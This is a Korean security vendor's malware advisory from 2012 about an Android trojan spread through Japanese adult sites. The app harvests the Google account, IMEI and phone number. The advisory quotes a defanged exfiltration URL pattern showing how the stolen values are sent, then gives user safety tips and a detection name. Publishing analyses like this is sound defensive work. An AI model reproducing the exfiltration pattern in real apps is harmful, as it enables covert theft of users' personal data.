분석 정보/악성코드 분석 정보

[주의]일본 음란 사이트에서 배포 중인 안드로이드 악성파일 발견

TACHYON & ISARC 2012. 1. 10. 13:54

1. 개 요


최근 국내 유명 공개자료실을 통해 안드로이드용 악성 애플리케이션이 유포된 사례가 발견되어 크게 이슈가된 바 있다. 국내에서 공식적으로 악성 애플리케이션이 유포된 첫번째 공식 사례였다. 그런 와중에 잉카인터넷 시큐리티대응센터 대응팀에서는 2012년 01월 10일 일본 사용자를 타깃으로 유포중인 악성 애플리케이션을 발견하여 국내 사용자를 대상으로 유사 사고 방지를 위해 관련 내용을 공유하고자 한다. 해당 악성 애플리케이션은 얼마전 국내에서 발견된 악성 애플리케이션과 유사한 감염 증상을 보이고 있다. 잉카인터넷 보안 관제 중 일본 안드로이드 사용자를 대상으로 제작된 첫 번째 악성파일 공식 발견 사례로 집계되었다.

  

비록, 애플리케이션 구동 위해 악의적 목적을 가지지 않고 이루어지는 단순 정보 수집단계라 할지라도 사용자의 동의를 구하지 않고 이루어지는 모든 정보 수집 단계는 현 시점에서 악성 기능이라 충분히 판단을 내릴 수 있는 만큼 사용자들 스스로 애플리케이션 다운로드 및 설치에 각별한 주의가 요망되고 있다.

[주의]안드로이드 기반 악성파일 국내 자료실에서 배포 (#Update 06)
http://erteam.nprotect.com/239

[안내]안드로이드 악성 앱 자동 탐지 & 분석 시스템 개발
http://erteam.nprotect.com/227

2. 유포 경로 및 감염 증상

해당 악성 안드로이드 파일의 경우 국내에서 특별한 감염 피해 사례는 아직까지 접수되진 않았으며, 일본의 특정 성인, 음란 관련 사이트에서 배포되고있는 것을 잉카인터넷 대응팀에서 자체 발견하여, 긴급 업데이트를 완료한 상태이다.

■ 설치 과정

유포 사이트 화면은 다음과 같이 ▶특정 성인사이트 URL 링크를 통해서 직접적인 배포를 시도하고 있기도 하며, ▶제작자 사이트로 추정되는 일본의 성인사이트에서 음란 동영상 재생에 필요한 파일처럼 보이도록 하여 설치를 유도하고 있기도 하다.



상기 사이트에 포함되어 있는 특정 일본 사이트의 URL 주소를 클릭하게 되면 다음과 같이 안드로이드 설치 파일이 다운로드 시도된다.


상기 악성파일이 다운로드되는 사이트는 일본의 성인용 음란사이트이며, 국내 정서에 반하며 매우 노골적이고, 선정적인 노출화면으로 가득한 사이트이다. (부분 모자이크 처리)


해당 악성 애플리케이션은 설치 시 아래와 같이 몇 안되는 특정 권한을 요구하고 있다.

 
※ 전체 권한

- android:name="android.permission.GET_ACCOUNTS"
- android:name="android.permission.INTERNET"


설치가 완료되면 아래의 그림과 같은 실행 아이콘이 생성된다. 다만, 다른 정상적인 애플리케이션과 달리 해당 악성 애플리케이션은 이름이 존재하지 않고 아이콘만 존재한다.


■ 실제 감염 증상

위와 같은 과정을 거쳐 설치를 모두 완료한 후 해당 악성 애플리케이션을 실행하면 아래의 그림과 같이 브라우저를 통해 성인 사이트(결제관련)로 연결된다.


아래는 악성 애플리케이션이 실행된 후 수행되는 전체적인 악성 동작에 대한 설명이다.

※ 전체 악성 기능

㉠ Google Email 계정 정보 수집
㉡ 스마트폰 단말기 정보 수집(IMEI, 전화번호 등)
㉢ 수집된 정보에 대한 외부 유출 시도

 - hxxp://(일부생략).com/send.php?a_id=[IMEI]&telno=[전화번호]&m_addr=[Google Email 계정]&usr_id=[NULL]

위 그림과 같이 브라우저를 통해 성인 사이트로 접속하면서 해당 악성 애플리케이션은 아래의 일부 코드를 통해 리시버 등록 과정을 수행한다.

 


위 코드를 살펴보면 한개의 리시버를 등록하는 과정이 수행되는 것을 확인할 수 있다. 이때 등록되는 리시버는 특정 서비스의 수행 과정을 체크하는 기능을 수행하며, 감시중인 특정 서비스가 수행될 경우 아래의 일부 코드와 같이 특정 정보에 대한 수집 후 외부 유출을 시도한다.

 


아래의 그림은 해당 악성 애플리케이션에 감염된 스마트폰에서 수집된 정보가 외부로 유출되는 증상에 대한 실제 동적 디버깅 과정중 일부 화면이다. 유출되는 정보는 위에서 설명한 "전체 악성 기능" 중 ㉢ 항목과 같다.
  

  

3. 예방 조치 방법

위와 같은 악성 애플리케이션의 경우 예전에는 러시아와 중국을 대상으로 유포가 이루어졌지만, 최근에는 유럽, 중동, 아시아 등 전세계에 걸쳐 다양한 악의적인 목적을 가지고 활발히 유포가 이루어지고 있다.

최근 국내에서 발견된 악성 애플리케이션과 해당 악성 애플리케이션은 "IMEI, 전화번호 등의 스마트폰 단말기 정보" 뿐만이 아니라 "Google Email 계정 등의 정보"도 수집을 하는데 이러한 정보가 유출될 경우 각종 악의적인 스팸메일 발송에 수집된 계정 정보가 사용될 수 있으며, 이는 스마트폰에 대한 정보 유출 피해 뿐만 아니라 사용중인 PC에 추가적인 악성파일의 감염을 초래하는 등 다양한 피해 상황을 초래할 수 있다.

이러한 악성 애플리케이션의 보안 위협으로부터 안전하기 위해서는 아래와 같은 "스마트폰 보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 주의가 무엇보다 중요하다고 할 수 있다.

※ 스마트폰 보안 관리 수칙

1. 신뢰할 수 있는 보안 업체에서 제공하는 모바일 백신을 최신 엔진 및 패턴 버전으로 업데이트하여 실시간 보안 감시 기능을 항상 "ON" 상태로 유지해 사용할 수 있도록 한다.

2. 애플리케이션 다운로드 시 항상 여러 사용자를 통해 검증된 어플리케이션을 선별적으로 다운로드 하는 습관을 가질 수 있도록 한다.

3. 다운로드한 애플리케이션은 항상 모바일 백신으로 검사한 후 사용 및 설치 하도록 한다.

4. 스마트폰을 통해 의심스럽거나 알려지지 않은 사이트 방문을 자제한다.

5. 발신처가 불분명한 MMS 등의 메시지, 이메일 등의 열람을 자제한다.

6. 스마트폰에는 항상 비밀번호 설정을 해두고 사용하도록 한다.

7. 블루투스와 같은 무선 인터페이스는 사용시에만 켜두도록 한다.

8. 중요한 정보 등의 경우 휴대폰에 저장해 두지 않는다.

9. 루팅과 탈옥 등 스마트폰 플랫폼의 임의적 구조 변경을 자제한다.


※ 잉카인터넷(시큐리티대응센터/대응팀)에서는 아래의 그림과 같이 "nProtect Mobile for Android" 를 통해 해당 악성 애플리케이션에 대한 진단/치료 기능을 무료로 제공하고 있으며, 다양한 모바일 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

진단명 :
- Trojan/Android.Jporn.A